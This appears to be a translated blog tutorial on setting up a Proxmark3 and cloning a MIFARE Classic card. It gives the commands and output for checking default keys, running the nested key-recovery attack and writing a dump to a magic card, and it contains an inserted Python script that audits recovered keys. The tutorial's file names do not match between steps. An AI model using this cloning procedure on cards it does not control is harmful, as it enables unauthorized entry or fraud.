PM3 environment setup
Setting up on Windows is fairly painful. A virtual machine works if you have one, but I strongly recommend WSL (Windows Subsystem for Linux), which is very convenient.
The following describes setup on Ubuntu, following the PM3 wiki.
First update the package lists and upgrade:
sudo apt-get update && sudo apt-get upgrade
Then install the required dependencies:
sudo apt install p7zip git build-essential libreadline5 libreadline-dev libusb-0.1-4 libusb-dev libqt4-dev perl pkg-config wget libncurses5-dev gcc-arm-none-eabi libstdc++-arm-none-eabi-newlib libpcsclite-dev pcscd
Clone the source:
git clone https://github.com/proxmark/proxmark3.git
Third-party firmware such as Iceman's can be used instead:
git clone https://github.com/RfidResearchGroup/proxmark3.git
Then pull the latest changes and set up the udev rule and serial-port permissions:
cd proxmark3
git pull
sudo cp -rf driver/77-mm-usb-device-blacklist.rules /etc/udev/rules.d/77-mm-usb-device-blacklist.rules
sudo udevadm control --reload-rules
sudo adduser $USER dialout
Compile the source:
make clean && make all
Now plug in the PM3. Since I am using WSL, Ubuntu shares the serial port with the host, so first determine the COM port number (COM7 here, which WSL exposes as /dev/ttyS7); then connect directly:
sudo ./proxmark3 /dev/ttyS7
Cracking an M1 card
First identify the card type. Start by checking the antenna readings with no card present:
proxmark3> hw tune
Measuring antenna characteristics, please wait.........
# LF antenna: 24.61 V @ 125.00 kHz
# LF antenna: 29.84 V @ 134.00 kHz
# LF optimal: 31.21 V @ 130.43 kHz
# HF antenna: 24.53 V @ 13.56 MHz
Displaying LF tuning graph. Divisor 89 is 134khz, 95 is 125khz.
Place the card on the HF antenna and measure again:
Measuring antenna characteristics, please wait.........
# LF antenna: 25.16 V @ 125.00 kHz
# LF antenna: 30.94 V @ 134.00 kHz
# LF optimal: 32.31 V @ 130.43 kHz
# HF antenna: 19.60 V @ 13.56 MHz
Displaying LF tuning graph. Divisor 89 is 134khz, 95 is 125khz.
The HF voltage drops noticeably, so this is a high-frequency card (the same method identifies low-frequency cards from the LF readings). A further command identifies it as an M1 (MIFARE Classic 1K) card:
proxmark3> hf search
UID : 60 64 7d 26
ATQA : 00 04
SAK : 08 [2]
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1
proprietary non iso14443-4 card found, RATS not supported
No chinese magic backdoor command detected
Prng detection: WEAK
Valid ISO14443A Tag Found - Quiting Search
Check whether the sectors use default keys:
proxmark3> hf mf chk *1 ? t
--chk keys. sectors:16, block no: 0, key type:?, eml:y, dmp=n checktimeout=471 us
No key specified, trying default keys
chk default key[ 0] ffffffffffff
chk default key[ 1] 000000000000
chk default key[ 2] a0a1a2a3a4a5
chk default key[ 3] b0b1b2b3b4b5
chk default key[ 4] aabbccddeeff
chk default key[ 5] 1a2b3c4d5e6f
chk default key[ 6] 123456789abc
chk default key[ 7] 010203040506
chk default key[ 8] 123456abcdef
chk default key[ 9] abcdef123456
chk default key[10] 4d3a99c351dd
chk default key[11] 1a982c7e459a
chk default key[12] d3f7d3f7d3f7
chk default key[13] 714c5c886e97
chk default key[14] 587ee5f9350f
chk default key[15] a0478cc39091
chk default key[16] 533cb6c723f6
chk default key[17] 8fd0a4f256e9
To cancel this operation press the button on the proxmark...
--o
|---|----------------|----------------|
|sec|key A |key B |
|---|----------------|----------------|
|000| ffffffffffff | ffffffffffff |
|001| ? | ? |
|002| ffffffffffff | ffffffffffff |
|003| ? | ? |
|004| ffffffffffff | ffffffffffff |
|005| ffffffffffff | ffffffffffff |
|006| ffffffffffff | ffffffffffff |
|007| ffffffffffff | ffffffffffff |
|008| ffffffffffff | ffffffffffff |
|009| ffffffffffff | ffffffffffff |
|010| ffffffffffff | ffffffffffff |
|011| ffffffffffff | ffffffffffff |
|012| ffffffffffff | ffffffffffff |
|013| ffffffffffff | ffffffffffff |
|014| ffffffffffff | ffffffffffff |
|015| ffffffffffff | ffffffffffff |
|---|----------------|----------------|
28 keys(s) found have been transferred to the emulator memory
Detailed usage for each command is available via help.
Some sectors use the default key ffffffffffff.
The M1 card has a known weakness: once the key of one sector is known, the keys of the remaining encrypted sectors can be recovered with the nested command:
proxmark3> hf mf nested 1 0 A FFFFFFFFFFFF d
--nested. sectors:16, block no: 0, key type:A, eml:n, dmp=y checktimeout=471 us
Testing known keys. Sector count=16
nested...
-----------------------------------------------
uid:60647d26 trgbl=4 trgkey=0
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=4 trgkey=1
Setting authentication timeout to 103us
Found valid key:01206f340100
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=0
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=4 trgkey=0
Setting authentication timeout to 103us
Found valid key:112233445566
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=0
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=0
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=0
Setting authentication timeout to 103us
Found valid key:50f6a442e26d
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
-----------------------------------------------
uid:60647d26 trgbl=12 trgkey=1
Setting authentication timeout to 103us
Found valid key:e59925b18b43
-----------------------------------------------
Nested statistic:
Iterations count: 17
Time in nested: 8.851 (0.521 sec per key)
|---|----------------|---|----------------|---|
|sec|key A |res|key B |res|
|---|----------------|---|----------------|---|
|000| ffffffffffff | 1 | ffffffffffff | 1 |
|001| 112233445566 | 1 | 01206f340100 | 1 |
|002| ffffffffffff | 1 | ffffffffffff | 1 |
|003| 50f6a442e26d | 1 | e59925b18b43 | 1 |
|004| ffffffffffff | 1 | ffffffffffff | 1 |
|005| ffffffffffff | 1 | ffffffffffff | 1 |
|006| ffffffffffff | 1 | ffffffffffff | 1 |
|007| ffffffffffff | 1 | ffffffffffff | 1 |
|008| ffffffffffff | 1 | ffffffffffff | 1 |
|009| ffffffffffff | 1 | ffffffffffff | 1 |
|010| ffffffffffff | 1 | ffffffffffff | 1 |
|011| ffffffffffff | 1 | ffffffffffff | 1 |
|012| ffffffffffff | 1 | ffffffffffff | 1 |
|013| ffffffffffff | 1 | ffffffffffff | 1 |
|014| ffffffffffff | 1 | ffffffffffff | 1 |
|015| ffffffffffff | 1 | ffffffffffff | 1 |
|---|----------------|---|----------------|---|
Printing keys to binary file dumpkeys.bin...
The keys of the other encrypted sectors have been recovered and written to dumpkeys.bin. This file must be converted into a format the PM3 understands before the card can be duplicated:
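An added example (not part of the original post or of the proxmark3 project) that reads the dumpkeys.bin produced above and reports which sectors still rely on well-known default keys, the kind of check you would run when auditing whether a deployed card depends on factory keys. It assumes the classic proxmark3 client layout of all key A values followed by all key B values, 6 bytes each (192 bytes for a 1K card); the sample input is constructed to reproduce the key table printed by the nested command.

```python
# Assumption: dumpkeys.bin holds 16 key A entries, then 16 key B entries, 6 bytes each.
SECTORS_1K = 16
KEY_LEN = 6

# The well-known keys that `hf mf chk` tried in the transcript above.
DEFAULT_KEYS = {
    "ffffffffffff", "000000000000", "a0a1a2a3a4a5", "b0b1b2b3b4b5",
    "aabbccddeeff", "1a2b3c4d5e6f", "123456789abc", "010203040506",
    "123456abcdef", "abcdef123456", "4d3a99c351dd", "1a982c7e459a",
    "d3f7d3f7d3f7", "714c5c886e97", "587ee5f9350f", "a0478cc39091",
    "533cb6c723f6", "8fd0a4f256e9",
}


def parse_dumpkeys(blob: bytes, sectors: int = SECTORS_1K) -> list[tuple[str, str]]:
    """Return one (key A, key B) hex pair per sector."""
    expected = sectors * 2 * KEY_LEN
    if len(blob) != expected:
        raise ValueError(f"dumpkeys.bin: expected {expected} bytes, got {len(blob)}")
    keys = [blob[i * KEY_LEN:(i + 1) * KEY_LEN].hex() for i in range(2 * sectors)]
    return list(zip(keys[:sectors], keys[sectors:]))


def audit(blob: bytes) -> dict:
    """Classify each sector: both keys default, one default, or both custom."""
    report = {"default": [], "partial": [], "custom": [], "reused": {}}
    seen: dict[str, list[int]] = {}
    for sec, (ka, kb) in enumerate(parse_dumpkeys(blob)):
        hits = (ka in DEFAULT_KEYS) + (kb in DEFAULT_KEYS)
        report[("custom", "partial", "default")[hits]].append(sec)
        for k in {ka, kb} - DEFAULT_KEYS:
            seen.setdefault(k, []).append(sec)
    # A custom key shared by several sectors means one recovered key opens all of them.
    report["reused"] = {k: s for k, s in seen.items() if len(s) > 1}
    return report


def sample_dumpkeys() -> bytes:
    """Constructed input reproducing the key table printed by `hf mf nested` above."""
    a = ["ffffffffffff"] * SECTORS_1K
    b = ["ffffffffffff"] * SECTORS_1K
    a[1], b[1] = "112233445566", "01206f340100"
    a[3], b[3] = "50f6a442e26d", "e59925b18b43"
    return bytes.fromhex("".join(a + b))


if __name__ == "__main__":
    r = audit(sample_dumpkeys())
    print(f"sectors on default keys: {r['default']}")
    print(f"sectors with custom keys: {r['custom']}  (partial: {r['partial']})")
```

Run it against a real dumpkeys.bin by replacing `sample_dumpkeys()` with `open("dumpkeys.bin", "rb").read()`; a card with everything in `default` offers no protection beyond the UID.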
proxmark3> script run dumptoemul.lua
--- Executing: ./scripts/dumptoemul.lua, args''
Wrote an emulator-dump to the file 2CF0550B.eml
-----Finished
proxmark3>
Then place the blank (magic) card on the HF antenna and write the data to it:
proxmark3> hf mf cload 60647D26
Chinese magic backdoor commands (GEN 1a) detected
Loading magic mifare 1K
Loaded from file: 60647D26.eml
Done!
References:
https://github.com/Proxmark/proxmark3/wiki/Ubuntu-Linux
https://www.cnblogs.com/k1two2/p/5706516.html
https://lzy-wi.github.io/2018/07/26/proxmark3/